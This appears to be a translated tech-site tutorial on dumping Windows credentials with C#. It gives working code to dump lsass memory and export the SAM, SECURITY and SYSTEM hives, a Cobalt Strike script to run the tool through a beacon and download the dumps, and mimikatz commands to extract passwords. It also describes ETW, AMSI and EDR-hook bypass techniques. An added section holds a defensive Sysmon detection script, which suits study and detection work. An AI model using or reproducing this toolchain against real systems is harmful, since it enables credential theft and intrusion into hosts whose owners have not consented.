2025-01-16 Update From: SLTechnology News&Howtos > Development
Shulou (Shulou.com) 06/03 Report
This article covers dumping system lsass memory and the SAM registry hives with C#. It walks through the code from a practical point of view; I hope you get something out of it.
1. Test permissions
Because dumping lsass memory and the SAM registry hives requires administrator privileges, first determine the permissions of the current process context.
```csharp
using System.Security.Principal;

// Returns true if the current process is running with administrative privs in a high integrity context.
public static bool IsHighIntegrity()
{
    var identity = WindowsIdentity.GetCurrent();
    var principal = new WindowsPrincipal(identity);
    return principal.IsInRole(WindowsBuiltInRole.Administrator);
}
```

2. lsass memory
MiniDumpWriteDump is an API in the MS DbgHelp.dll that writes a dump of a running process. It is used here to dump lsass memory; the function is first declared via P/Invoke.
```csharp
[DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);
```
Then call the function and save the dump file, as shown in the following code:
```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace sharpdump
{
    public class MiniDumper
    {
        // Uses the MiniDumpWriteDump P/Invoke declared above.
        public static string MiniDump()
        {
            Process[] pLsass = Process.GetProcessesByName("lsass");
            string dumpFile = Path.Combine(Path.GetTempPath(), string.Format("lsass{0}.dmp", pLsass[0].Id));
            if (File.Exists(dumpFile)) File.Delete(dumpFile);
            Console.WriteLine(String.Format("[*] Dumping lsass ({0}) to {1}", pLsass[0].Id, dumpFile));
            using (FileStream fs = new FileStream(dumpFile, FileMode.Create, FileAccess.ReadWrite, FileShare.Write))
            {
                // dumpType 2 = MiniDumpWithFullMemory
                bool bRet = MiniDumpWriteDump(pLsass[0].Handle, (uint)pLsass[0].Id, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
                if (bRet)
                {
                    Console.WriteLine("[+] Dump successful!");
                    return dumpFile;
                }
                else
                {
                    Console.WriteLine(String.Format("[X] Dump Failed! ErrorCode: {0}", Marshal.GetLastWin32Error()));
                    return null;
                }
            }
        }
    }
}
```

3. Implement reg save to save the SAM registry hives
First import the APIs that will be used:
```csharp
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
public static extern int RegOpenKeyEx(UIntPtr hKey, string subKey, int ulOptions, int samDesired, out UIntPtr hkResult);

[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern int RegSaveKey(UIntPtr hKey, string lpFile, IntPtr lpSecurityAttributes);

[DllImport("advapi32.dll", SetLastError = true)]
public static extern int RegCloseKey(UIntPtr hKey);
```
Then build the function that uses reg save to export the "SAM", "SECURITY" and "SYSTEM" hives.
```csharp
using System;
using System.IO;

namespace sharpdump
{
    internal class Reg
    {
        public static UIntPtr HKEY_LOCAL_MACHINE = new UIntPtr(0x80000002u);
        public static int KEY_READ = 0x20019;
        public static int KEY_ALL_ACCESS = 0xF003F;
        public static int REG_OPTION_OPEN_LINK = 0x0008;
        public static int REG_OPTION_BACKUP_RESTORE = 0x0004;
        public static int KEY_QUERY_VALUE = 0x1;

        // Uses the RegOpenKeyEx / RegSaveKey / RegCloseKey P/Invokes declared above.
        public static void ExportRegKey(string key, string outFile)
        {
            var hKey = UIntPtr.Zero;
            try
            {
                // https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexa
                RegOpenKeyEx(HKEY_LOCAL_MACHINE, key, REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_ALL_ACCESS, out hKey);
                RegSaveKey(hKey, outFile, IntPtr.Zero);
                RegCloseKey(hKey);
                Console.WriteLine("Exported HKLM\\{0} at {1}", key, outFile);
            }
            catch (Exception e)
            {
                throw e;
            }
        }

        public static string DumpReg(string key)
        {
            try
            {
                String addr = key + ".HIV";
                addr = Path.Combine(Path.GetTempPath(), addr);
                ExportRegKey(key, addr);
                return addr;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
                Console.WriteLine(e.StackTrace);
                return "";
            }
        }
    }
}
```
The files are dumped to the temp directory, and all successfully dumped files are then packaged for easy download. The complete code will be uploaded to Knowledge Planet later.
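From the defender's side, both steps above leave telemetry: opening lsass.exe with a handle carrying PROCESS_VM_READ and PROCESS_QUERY_INFORMATION (what MiniDumpWriteDump needs) appears as a Sysmon Event ID 10 (ProcessAccess), and the files written to %TEMP% follow the naming the code uses, lsass<pid>.dmp and SAM/SECURITY/SYSTEM.HIV (Sysmon Event ID 11, FileCreate). The script below is an added detection example, not part of the original article; the Sysmon-like JSON lines, the allowlist and the paths are constructed assumptions.

```python
import json
import re

# Access-mask bits MiniDumpWriteDump needs on its lsass handle (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
MINIDUMP_MIN_ACCESS = 0x0010 | 0x0400

# Artifacts the article's code writes to %TEMP%: lsass<pid>.dmp and SAM/SECURITY/SYSTEM.HIV.
DUMP_ARTIFACT_RE = re.compile(r"\\Temp\\(lsass\d+\.dmp|(SAM|SECURITY|SYSTEM)\.HIV)$", re.IGNORECASE)

# Hypothetical allowlist of processes expected to open lsass; tune it per environment.
LSASS_ACCESS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}


def check_event(ev):
    """Return an alert string for one Sysmon-style event dict, or None if it is benign."""
    eid = ev.get("EventID")
    if eid == 10 and ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        src = ev.get("SourceImage", "")
        # .NET Process.Handle opens with broad rights, so 0x1FFFFF is the mask commonly seen.
        if (granted & MINIDUMP_MIN_ACCESS) == MINIDUMP_MIN_ACCESS and src.lower() not in LSASS_ACCESS_ALLOWLIST:
            return "lsass opened with VM_READ|QUERY_INFORMATION (0x%x) by %s" % (granted, src)
    if eid == 11 and DUMP_ARTIFACT_RE.search(ev.get("TargetFilename", "")):
        return "credential dump artifact written: %s" % ev["TargetFilename"]
    return None


def scan(lines):
    """Parse JSON lines and return [(line_no, alert), ...] for events that match."""
    hits = []
    for no, line in enumerate(lines, 1):
        if line.strip():
            alert = check_event(json.loads(line))
            if alert:
                hits.append((no, alert))
    return hits


# Constructed sample telemetry (not real logs): Sysmon-like events as JSON lines.
SAMPLE_LOG = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\tasklist.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "SourceImage": "C:\\Users\\u\\Dumper.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 11, "Image": "C:\\Users\\u\\Dumper.exe", "TargetFilename": "C:\\Users\\u\\AppData\\Local\\Temp\\lsass672.dmp"}
{"EventID": 11, "Image": "C:\\Users\\u\\Dumper.exe", "TargetFilename": "C:\\Users\\u\\AppData\\Local\\Temp\\SAM.HIV"}
{"EventID": 11, "Image": "C:\\Windows\\notepad.exe", "TargetFilename": "C:\\Users\\u\\AppData\\Local\\Temp\\notes.txt"}
"""

if __name__ == "__main__":
    for no, alert in scan(SAMPLE_LOG.splitlines()):
        print("line %d: %s" % (no, alert))
```

Only the Dumper.exe handle open and the two artifact writes are flagged; the allowlisted csrss.exe open and the tasklist.exe open with PROCESS_QUERY_LIMITED_INFORMATION (0x1000) alone are not.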
4. About ExecuteAssembly
ExecuteAssembly is an alternative to CS's execute-assembly component. It is built in C/C++ and helps researchers load and inject .NET assemblies.
ExecuteAssembly reuses the host process (spawnto) to load the CLR module/AppDomainManager, stomps the loader/.NET assembly PE DOS header, and unloads the .NET-related modules for ETW+AMSI bypass. In addition, it bypasses EDR hooks by using static NT system calls and hides imports by resolving APIs dynamically (superfasthash hash algorithm).
At present, both metasploit-framework and Cobalt Strike provide execute-assembly functionality. The following takes Cobalt Strike as an example to dump system lsass memory and the SAM registry hives.
5. CS plug-in
Taking Cobalt Strike as an example, write a simple cna script:
```
popup beacon_bottom {
    menu "Dumper" {
        item "SharpDump" {
            local('$bid');
            foreach $bid ($1) {
                bexecute_assembly($bid, script_resource("Dumper.exe"));
            }
        }
        item "DownloadDump" {
            prompt_text("File's address to download", "", lambda({ bdownload(@ids, $1); }, @ids => $1));
        }
    }
}
```
After loading the script, run SharpDump; the result is as follows:
Download the dump.gz stored in the temp directory, extract it with Decompress, and finally use mimikatz to parse the lsass.dmp and sam files:
```
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
lsadump::sam /sam:sam.hiv /system:system.hiv
```
The above is the C# dump of system lsass memory and the SAM registry hives shared by the editor. If you happen to have similar doubts, you may refer to the above analysis. If you want to know more, you are welcome to follow the industry information channel.